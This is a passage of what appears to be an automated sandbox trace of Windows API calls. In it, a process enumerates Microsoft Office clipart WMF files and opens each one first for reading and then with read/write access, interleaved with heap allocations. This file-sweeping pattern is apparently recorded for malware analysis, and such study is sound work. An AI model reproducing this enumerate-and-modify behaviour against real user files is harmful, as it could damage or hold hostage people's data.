dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0102.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0102.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0102.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0102.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0102.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.314] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0102.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0102.314] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0102.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0102.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0102.315] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.315] AreFileApisANSI () returned 1 [0102.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0102.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.315] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0102.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.315] AreFileApisANSI () returned 1 [0102.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.315] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ae18 [0102.315] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8ae18, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 69 [0102.315] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19828_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.316] GetFileType (hFile=0x368) returned 0x1 [0102.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0102.317] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.317] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.317] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.317] CloseHandle (hObject=0x368) returned 1 [0102.318] AreFileApisANSI () returned 1 [0102.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8abb8 [0102.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8abb8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 69 [0102.318] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19828_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.318] GetFileType (hFile=0x368) returned 0x1 [0102.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0102.318] CloseHandle (hObject=0x368) returned 1 [0102.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.318] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0102.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0102.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0102.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0102.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.319] AreFileApisANSI () returned 1 [0102.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b078 [0102.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8b078, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF") returned 69 [0102.320] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19828_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19828_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2244)) returned 1 [0102.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0102.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0102.320] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.320] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.320] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3896, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BD19986_.WMF", cAlternateFileName="")) returned 1 [0102.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0102.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0102.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f30 [0102.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f30 | out: hHeap=0x20000) returned 1 [0102.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0102.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f008 [0102.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0102.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ace8 [0102.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0102.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0102.321] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.321] AreFileApisANSI () returned 1 [0102.321] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0102.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.321] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0102.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0102.321] AreFileApisANSI () returned 1 [0102.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.321] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a6f8 [0102.321] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a6f8, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 69 [0102.321] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19986_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.322] GetFileType (hFile=0x368) returned 0x1 [0102.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0102.322] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.323] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.323] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.323] CloseHandle (hObject=0x368) returned 1 [0102.323] AreFileApisANSI () returned 1 [0102.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a958 [0102.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a958, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 69 [0102.323] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19986_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0102.323] GetFileType (hFile=0x368) returned 0x1 [0102.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a958 | out: hHeap=0x20000) returned 1 [0102.324] CloseHandle (hObject=0x368) returned 1 [0102.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0102.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0102.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0102.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0102.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0102.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0102.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0102.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0102.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.325] AreFileApisANSI () returned 1 [0102.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a8c0 [0102.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a8c0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF") returned 69 [0102.325] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD19986_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd19986_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, 